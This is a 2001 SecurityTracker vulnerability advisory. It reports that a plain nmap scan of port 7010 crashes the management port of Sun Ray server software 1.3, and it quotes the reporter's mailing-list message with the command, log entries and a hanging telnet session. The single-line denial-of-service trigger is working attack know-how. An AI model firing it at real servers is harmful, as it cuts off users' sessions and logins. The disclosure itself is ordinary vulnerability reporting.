SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Device (Embedded Server/Appliance)  >   Sun Ray Vendors:   Sun
Sun Ray Appliance Management Port Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1002974
SecurityTracker URL:  http://securitytracker.com/id/1002974
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 14 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): tested using SunRay server software 1.3 on Solaris 8
Description:   A denial of service vulnerability has been reported in the Sun Microsystems Sun Ray appliance. A remote user can cause the server's management port to crash.

A remote user can cause the server's management port to crash with a simple nmap port scan:

nmap -p 7010 [targethost]

This will cause the management port to stop accepting connections and may cause existing management connections to drop.

The following is the log file entry caused by the above nmap scan:

Dec 14 07:21:09 brnray utauthd: [ID 250799 user.info] CallBack0 UNEXPECTED:
Cannot accept on socket: java.net.SocketException: Software caused
connection abort
Impact:   A remote user can cause the Sun Ray appliance's management port to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sun.com/products/sunray/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  

Message History:   None.

 Source Message Contents
Date:  Fri, 14 Dec 2001 07:45:26 +0100
Subject:  Again: Possible DoS attack against Sun Ray Servers?


I have used a patch-reboot cycle to make an experiment.

A simple

  nmap -p 7010 brnray

is sufficient to shut down port 7010 of my SunRay server
brnray for good.

This concerns SunRay server software 1.3 on Solaris 8,
with, maybe, almost the latest patches.

Hanspi


P.S. A small protocol.  I worked on brnfire; brnray is the SunRay server

brnfire> telnet brnray 7010

> status

[[[output O.K.]]]

brnfire> nmap -p 7010 brnray

--- log entries

Dec 14 07:21:09 brnfire sudo: [ID 850335 local2.notice]      hps :
TTY=pts/16 ; PWD=/home/hps ; USER=root ; COMMAND=/usr/sepp/bin/nmap -p 7010
brnray
Dec 14 07:21:09 brnray utauthd: [ID 250799 user.info] CallBack0 UNEXPECTED:
Cannot accept on socket: java.net.SocketException: Software caused
connection abort

----

brnfire> telnet brnray 7010

[[[session hangs]]]

[[[From this point on, users cannot log in anymore, and users
   that are already logged in may lose their sessions.]]]


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC